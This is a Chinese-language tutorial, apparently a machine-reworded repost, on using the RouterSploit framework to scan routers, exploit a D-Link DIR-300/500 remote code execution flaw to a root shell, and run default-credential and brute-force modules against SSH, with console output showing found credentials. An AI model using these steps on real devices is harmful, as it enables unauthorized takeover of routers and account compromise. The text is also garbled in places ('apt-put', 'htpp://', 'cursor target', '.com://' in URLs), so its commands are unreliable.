RouterSploit:路由器漏洞检测及利用框架
"RouteSploit框架结构是一款开源系统的漏洞检测及利用框架结构,其对于的对象主要为路由等内嵌式设备。
框架结构功能
RouteSploit框架结构主要由可用以渗透测试的多个程序模块模块组合而成,
1、 Scanners:控制模块功能主要为检查目标设备是否存在可利用的网络安全问题;
2、Creds:控制模块功能主要对于计算机服务的登陆验证动态口令进行检验;
3、Exploits:控制模块功能主要为鉴别到目标设备网络安全问题之后,对系统漏洞进行利用,实现提权等目的。
工具安装
sudo apt-put install python-requests python-paramiko python-netsnmp
git clone htpp://github.Com/reverse-shell/routersploit
./rsf.py
GitHub具体位置如上指令中上述为:RouteSploit。
操作使用
首先,运行RouteSploit框架结构,具体如下如图
root@kalidev:~/git/routersploit# ./rsf.py
______ _ _____ _ _ _
| ___ \ | | / ___| | | (_) |
| |_/ /___ _ _| |_ ___ _ __\ `--. _ __ | | ___ _| |_
| // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
| |\ \ (_) | |_| | || __/ | /\__/ / |_) | | (_) | | |_
\_| \_\___/ \__,_|\__\___|_| \____/| .__/|_|\___/|_|\__|
| |
Router Exploitation Framework |_|
Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
Codename : Wildest Dreams
Version : 1.0.0
rsf >
1、Scanners 控制模块
scanners控制模块,享有设备漏洞扫描功能,通过该控制模块,可迅速鉴别目标设备是否存在可利用的网络安全问题,下面会以一个dlink路由为例,相结合进行操作叙述。
(1)选择scanners控制模块,操作如下,
rsf > use scanners/dlink_scan
rsf (D-Link Scanner) > show options
(2)显视选项卡
Target options:
Name Current settings Description
---- ---------------- -----------
target Target address e.g. .com://192.168.1.1
port 80 Target port
(3)设置目标设备iP
rsf (D-Link Scanner) > cursor target 192.168.1.1 [+] {'target': '192.168.1.1'}
(4)运作控制模块,实行情况如下,
rsf (D-Link Scanner) > run
[+] exploits/dlink/dwr_932_info_disclosure Is vulnerable
[-] exploits/dlink/dir_300_390_615_auth_bypass Is not vulnerable
[-] exploits/dlink/dsl_2750b_info_disclosure Is not vulnerable
[-] exploits/dlink/dns_390l_327l_rce Is not vulnerable
[-] exploits/dlink/dir_645_password_disclosure Is not vulnerable
[-] exploits/dlink/dir_300_500_615_info_disclosure Is not vulnerable
[-] exploits/dlink/dir_300_500_rce Is not vulnerable
[+] Device Is vulnerable!
- exploits/dlink/dwr_932_info_disclosure
如上所表现的结果,目标设备存在dwr_932_info_disclosure系统漏洞。下一步,我们选择合适的payload进行传送和检测(以下牵涉exploits控制模块功能操作,如需,请再向下查找),
2、Exploits 控制模块
(1)选择Exploits控制模块,操作如下,
rsf > use exploits/
exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/ rsf > use exploits/dlink/dir_300_500_rce
rsf (D-LINK DIR-300 & DIR-500 RCE) >
我们也可以使用“tab”键来自动填补键入指令。
(2)显视选项卡
rsf (D-LINK DIR-300 & DIR-500 RCE) > show options
Target options:
Name Current settings Description
---- ---------------- -----------
target Target address e.g. .com://192.168.1.1
port 80 Target Port
设置选项卡,操作如下,
rsf (D-LINK DIR-300 & DIR-500 RCE) > cursor target .com://192.168.1.1 [+] {'target': '.com://192.168.1.1'}
(3)运作控制模块
通过使用“run”或“exploit”指令来完成系统漏洞的利用,
rsf (D-LINK DIR-300 & DIR-500 RCE) > run [+] Target Is vulnerable [*] Invoking command loop有限公司 cmd > whoami root
也可检验目标设备是否存在选中的网络安全问题,操作如下,
rsf (D-LINK DIR-300 & DIR-500 RCE) > check
[+] Target Is vulnerable
(4)显视具体系统漏洞信息
通过“show info”指令,显视系统漏洞信息,包括其存在的设备品牌、型号规格、系统漏洞类型及参看来源于,具体参看如下,
rsf (D-LINK DIR-300 & DIR-500 RCE) > show info Name: D-LINK DIR-300 & DIR-500 RCE Description: Module exploits D-Link DIR-300, DIR-500 Remote Code Execution vulnerability which allows executing command On operating system level with root privileges. Targets: - D-Link DIR 300 - D-Link DIR 500 Authors: - Michael Messner at]s3cur1ty.de> # vulnerability discovery - Marcin Bury bury[at]reverse-shell.Com> # routersploit module References: - .com://www.dlink.Com/uk/es/home-solutions/connect/routers/dir-500-wireless-n-250-home-router - .com://www.s3cur1ty.de/home-network-horror-days - .com://www.s3cur1ty.de/m1adv2013-003
3、?Creds控制模块
(1)选择控制模块
此控制模块相关文档坐落于 /routesploit/modules/creds/ 文件目录下,以下为该控制模块支持检验的服务,
?ftp
?ssh
?telnet
?http basic auth
?http form auth
?snmp
在检测过程中,可通过两个层面对上述的每个服务进行检测,
默认服务登录口令检测:利用框架提供的各类路由等设备以及服务的默认登录口令字典,通过快速列举的方式,可在较短时间内(几秒钟)验证设备是否仍使用默认登录口令;
暴力破解:利用框架中所提供的特定账户或者账户列表进行字典攻击。其中包含两个参数(登录账户及密码),如框架/routesploit/wordlists目录中字典所示,参数值可以为一个单词(如’admin’),或者是一整个单词列表。
(2)控制台
rsf > use creds/
creds/ftp_bruteforce creds/http_basic_bruteforce creds/http_form_bruteforce creds/snmp_bruteforce creds/ssh_default creds/telnet_default
creds/ftp_default creds/http_basic_default creds/http_form_default creds/ssh_bruteforce creds/telnet_bruteforce
rsf > use creds/ssh_default
rsf (SSH Default Creds) >
(3)显示选项
(4)设置目标设备IP
rsf (SSH Default Creds) > set target 192.168.1.53 [+] {'target': '192.168.1.53'}
(5)运行模块
rsf (SSH Default Creds) > run
[*] Running module...
[*] worker-0 process is starting...
[*] worker-1 process is starting...
[*] worker-2 process is starting...
[*] worker-3 process is starting...
[*] worker-4 process is starting...
[*] worker-5 process is starting...
[*] worker-6 process is starting...
[*] worker-7 process is starting...
[-] worker-4 Authentication failed. Username: '3comcso' Password: 'RIP000'
[-] worker-1 Authentication failed. Username: '1234' Password: '1234'
[-] worker-0 Authentication failed. Username: '1111' Password: '1111'
[-] worker-7 Authentication failed. Username: 'ADVMAIL' Password: 'HP'
[-] worker-3 Authentication failed. Username: '266344' Password: '266344'
[-] worker-2 Authentication failed. Username: '1502' Password: '1502'
(..)
Elapsed time: 38.9181981087 seconds
[+] Credentials found!
Login Password
----- --------
admin 1234
相关文章
- 3条评论
- 馥妴邶谌2022-05-30 16:49:07
- Target address e.g. .com://192.168.1.1 port 80 Target port (3)设置目标设备iPr
- 晴枙债姬2022-05-30 12:18:12
- Targ
- 柔侣遐迩2022-05-30 10:08:55
- ------- &nbs